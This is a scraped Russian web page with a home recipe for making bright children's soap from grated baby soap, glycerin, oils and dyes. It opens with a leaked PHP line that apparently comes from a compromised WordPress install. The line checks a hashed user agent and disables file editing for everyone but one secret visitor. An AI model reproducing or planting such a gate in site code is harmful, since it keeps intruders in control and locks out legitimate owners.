if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Делаем своими руками яркое мыло для детей | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Делаем своими руками яркое мыло для детей

Сегодня мы расскажем как своими руками сделать детское мыло. Благодаря своему яркому цвету, но обязательно понравится детям, а взрослым - будет простор для фантазии!

Сего­дня мы рас­ска­жем как сво­и­ми рука­ми сде­лать дет­ское мыло. Бла­го­да­ря сво­е­му ярко­му цве­ту, но обя­за­тель­но понра­вит­ся детям, а взрос­лым — будет про­стор для фантазии!

Пона­до­бят­ся:

  • Дет­ское мыло без запа­ха – 2 кусочка;
  • Фор­ма;
  • Пол­ку­соч­ка цвет­но­го мыла;
  • Эфир­ные мас­ла (по вку­су, напри­мер, бер­га­мо­та и грейпфрута);
  • По 2 ст.л. мас­ла-осно­вы и глицерина;
  • 8 ст.л. воды;
  • Кра­си­те­ли (напри­мер, пище­вые жел­тый и зеле­ный), посу­да, нож, терка.
  1. Дет­ское мыло нате­реть на тер­ке, часть цвет­но­го мыла наре­зать куби­ка­ми, часть – произвольно.
    дм2
  2. Натер­тое мыло раз­ло­жить по двум емко­стям, доба­вив в каж­дую по 1 лож­ке гли­це­ри­на и мас­ла, 4 лож­ки воды, растопить.
    дм3
  3. Каж­дую часть окра­сить и ароматизировать.
  4. Выло­жить одну часть в фор­му, засы­пать про­из­воль­но наре­зан­ным мылом. Залить дру­гой рас­топ­лен­ной частью, засы­пать остав­шим­ся натер­тым мылом. Дать застыть.
    дм4

И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Юлия

Обожаю в свободное время заниматься мыловарением. Уже съела на этом целую собаку! Вот теперь спешу поделиться с вами своими работами ;) Читайте все мои записи!